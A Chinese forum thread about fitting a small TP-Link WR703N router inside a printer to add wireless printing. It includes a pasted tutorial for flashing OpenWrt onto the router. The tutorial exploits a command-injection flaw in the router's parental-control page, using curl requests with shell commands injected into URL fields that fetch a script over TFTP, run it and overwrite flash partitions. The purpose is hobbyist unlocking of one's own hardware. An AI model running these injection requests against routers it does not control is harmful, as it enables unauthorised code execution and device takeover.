[外设] 打印机增加无线打印功能

楼主(2020-09-12):
家里办公桌太小了,打印机没地方放,放远了USB线就不好连,

原先用路由器整了个打印服务器搞无线打印,可是各种线插头一大堆,太难看,于是搞了个小路由器内置在打印机里。

路由器选的是TP的703,带一个USB口,5V供电,闲鱼是收的一个,本来以为自己能刷第三方固件,可是不巧这个路由器是较新的版本,还得解锁,自己水平太差,弄了几个小时都没成功,最后还是请别人远程帮忙刷好的,惭愧惭愧。
打印机自已的供电是24V的,而且没有负载供电还会降压,不好弄。为了解决供电,拆了一个充电器塞进了打印机

安放这里正合适,外壳都不用拆,还能再回收利用。

打印机背部打孔,给路由器加个电源开关,打印机的USB口直接剪线焊接,想接有线没阻碍,只要关掉路由器就行了。
最终效果还不错,只要打印机在主路由器WIFI范围内,就可以无线打印。

网友A:
厉害了。路由是什么配置?刷的什么固件?

网友B:
我选择99买一个小白盒子

网友C:
引用 网友B:
我选择99买一个小白盒子

土豪级的,随便找个7620的usb口路由就行了

楼主:
引用 网友C:
土豪级的,随便找个7620的usb口路由就行了

20块钱买的路由也土豪?

网友:
路由器如果拆板子出来会不会体积更好处理一些。

网友:
没看明白,黑色的干嘛也不像电源啊

网友:
引用 楼主:
20块钱买的路由也土豪?

99突然变成20了

网友D:
楼主也说下具体过程撒~一步就到结果了

楼主:
引用 网友D:
楼主也说下具体过程撒~一步就到结果了

路由器刷 openwrt固件,这个网上有很多教程,我是觉得这次改装主要的巧妙之处在于全部内置,抛砖引玉吧。

楼主:
引用 网友A:
厉害了。路由是什么配置?刷的什么固件?

这个路由器配置很低,好像只有4M rom,刷的是openwrt固件

楼主:
我是参考以下教程刷的固件。

TL-WR703N v1.7刷openwrt
阅读 841
收藏 0
2017-12-12
原文链接: github.com
TP-LINK TL-WR703N是一个小型的路由器,可以有线转WiFi,3G转WiFi,很多人拿它刷openwrt系统,然后可以在上面各种搞事。

V1.7以前
通常刷openwrt的做法是,

下载一个openwrt factory固件
打开路由器,
笔记本连接路由器发出来的WiFi,比如:TP-LINK-90-1B-18
在浏览器输入192.168.1.1,选择左边“系统工具”-“软件升级”-“浏览”
找到刚刚下载的镜像bin文件,确定
然后就会自动把openwrt刷到板子里边了
V1.7以后
然而!上面的方法只有在2012年12月生产的WR703N(型号在FW build 121204以后的,这个在路由器管理界面可以看到,如果你的型号跟我的一样是3.17.1 Build 140120 Rel.56593n,那么恭喜你中奖了,只能通过下面这种方式或者TTL硬件方式刷openwrt)上才有用,在之后的板子上,选择完bin文件会提示“上传的文件与硬件版本不符”,导致无法从web管理界面刷写系统!

原因是,2012年12月之后的系统升级,对bin文件做了RSA签名校验,无法刷第三方的系统。

一番搜索之后发现有个国外的牛人利用TP-LINK家长控制的漏洞,让路由板执行一些代码,成功刷写openwrt系统,这个方法的英文版也被放到了openwrt wr703n的官方wiki上,可以说是相当靠谱了,国内有人也整理了一个中文版,但有些步骤还是不够详细,于是我整理了一个完整的版出来,让大家少踩一些坑。windows的同学可以参考这个中文版,不过里边有些链接失效了,可以参考我这篇去找对应的工具。

搭建tftp服务器
因为我们会先把镜像下载并处理好放在一个ftp服务器上,所以需要另一台电脑扮演这个角色

以MacOS为例,MacOS是内置了tftp服务器的,不需要另外安装,
默认的ftp服务器会把将/private/tftpboot这个目录作为根目录
修改这个目录的权限
sudo chmod 777 /private/tftpboot
sudo chmod 777 /private/tftpboot/*
启动tftp服务
sudo launchctl load -F /System/Library/LaunchDaemons/tftp.plist
sudo launchctl start com.apple.tftpd
测试,在另一台电脑上,以Ubuntu为例,安装tftp客户端
cwh@cwh-Matrimax-PC:sudo apt-get install tftp
cwh@cwh-Matrimax-PC:~$ tftp
(to) 192.168.2.210
tftp> get aa
把Ubuntu和mac放在一个局域网里,mac的ip是192.168.2.210,在mac的/private/tftpboot目录下有一个名为aa的文件,执行get aa之后,会发现Ubuntu的home目录下多了一个aa文件,也就是文件传送成功了。

准备工具
*Nix系统下curl,dd,都是自带的,不用下载,
下载busybox,这个是用来在wr703n上执行dd和reboot命令用的,默认的命令行执行不了
curl https://busybox.net/downloads/binaries/1.21.1/busybox-mips > busybox
链接有可能失效,可以谷歌搜索busybox binary download,下载mips版本的

下载openwrt固件并拆分成两份(因为wr703n的内存很小,可能传输的时候传不了整个文件)
curl https://downloads.openwrt.org/sn ... quashfs-factory.bin -o openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin
dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin of=i1 bs=1 count=1048576
dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin of=i2 bs=1 skip=1048576
将busybox, 拆开的固件i1, i2放到tftp服务器目录/private/tfboot下
编写Hack脚本
进入tftp服务器目录
新建文件aa(很随意的一个名字),里边内容为:
cd /tmp
tftp -gl i1 192.168.1.100
tftp -gl i2 192.168.1.100
tftp -gl busybox 192.168.1.100
chmod 755 busybox
./busybox dd if=i1 of=/dev/mtdblock1 conv=fsync
./busybox dd if=i2 of=/dev/mtdblock2 conv=fsync
reboot -f
解释一下每行代码

cd /tmp
tftp -gl i1 192.168.1.100 # 把i1从tftp服务器下载下来,这里的ip应该是,你的tftp服务器连接路由器之后,ifconfig看到的ip
tftp -gl i2 192.168.1.100 # 把i2从tftp服务器下载下来
tftp -gl busybox 192.168.1.100 # 把busybox从tftp服务器下载下来
chmod 755 busybox  # 修改busybox权限以执行命令
./busybox dd if=i1 of=/dev/mtdblock1 conv=fsync # 将i1写入磁盘分区
./busybox dd if=i2 of=/dev/mtdblock2 conv=fsync # 将i2写入磁盘分区
reboot -f # 重启,会启动openwrt
至此,你的tftp目录下应该有4个文件:i1, i2, aa, busybox,缺一不可

Hack into TL-WR703N
这个方法是利用TPLINK家长控制漏洞,以curl的方式执行命令,让路由器从tftp服务器上下载脚本,执行命令,从而将openwrt固件写入路由器

【警告】以下步骤可能导致你的路由器变砖,请确认当前的路由器固件版本是3.17.1 Build 140120. 下述全过程请勿断开连接或是断开电源,本人不对产生的任何后果负责!另外,每一步都很重要,别忽略其中任何一步。一旦变砖,请用3.3V的串口线抢救

首先长按reboot按钮将路由器恢复出厂设置

将tftp服务器(这里是Mac)通过WiFi的方式连接到路由器,ifconfig记住自己的ip,我的是192.168.1.100

在tftp服务器上(连接到路由器的另外一台机器也行)执行

修改密码为admin42

curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=true' 'http://192.168.1.1/'
注意这里的192.168.1.1是路由器的ip地址, 这个步骤只会更改路由器家长控制的默认密码,刷完openwrt之后会恢复为openwrt的默认密码的

启用家长控制(利用漏洞)
curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm' 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?ctrl_enable=1&parent_mac_addr=00-00-00-00-00-02&Page=1'
让路由器从tftp服务器下载并执行脚本
curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?Modify=0&Page=1' 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?child_mac=00-00-00-00-00-01&lan_lists=888&url_comment=test&url_0=;cd%20/tmp;&url_1=;tftp%20-gl%20aa%20192.168.1.100;&url_2=;sh%20aa;&url_3=&url_4=&url_5=&url_6=&url_7=&scheds_lists=255&enable=1&Changed=1&SelIndex=0&Page=1&rule_mode=0&Save=%B1%A3+%B4%E6'
等待大约三分钟,路由器会重启进入openwrt系统,状态灯会闪烁一会儿

进入openwrt系统
后边可以参考这位大兄弟写的教程,挺详细的了

楼主:
最后没有成功,花了20块钱,在咸鱼上换了个人直接远程搞定。

网友E:
引用 楼主:
最后没有成功,花了20块钱,在咸鱼上换了个人直接远程搞定。

请问LZ,同一网络下的电脑手机设备,要添加网络打印机吗?

网友F:
光打印共享还不行,扫描不能用,还是要用virtualhere才好,用virtualhere相当于物理连接,打印扫描一体机上的扫描仪功能也能用

网友:
引用 楼主:
我是参考以下教程刷的固件。

TL-WR703N v1.7刷openwrt

楼主:
引用 网友F:
光打印共享还不行,扫描不能用,还是要用virtualhere才好,用virtualhere相当于物理连接,打印扫描一体机上 ...

我这打印机是个便宜货,没扫描复印

楼主:
引用 网友E:
请问LZ,同一网络下的电脑手机设备,要添加网络打印机吗?

手机我只有苹果,添加不了,同一局域网下的电脑都可以添加这个打印机

网友G:
我把打印机插光猫了,笔记本连家里的WiFi就可以打印

楼主:
引用 网友G:
我把打印机插光猫了,笔记本连家里的WiFi就可以打印

你的打印机估计有网口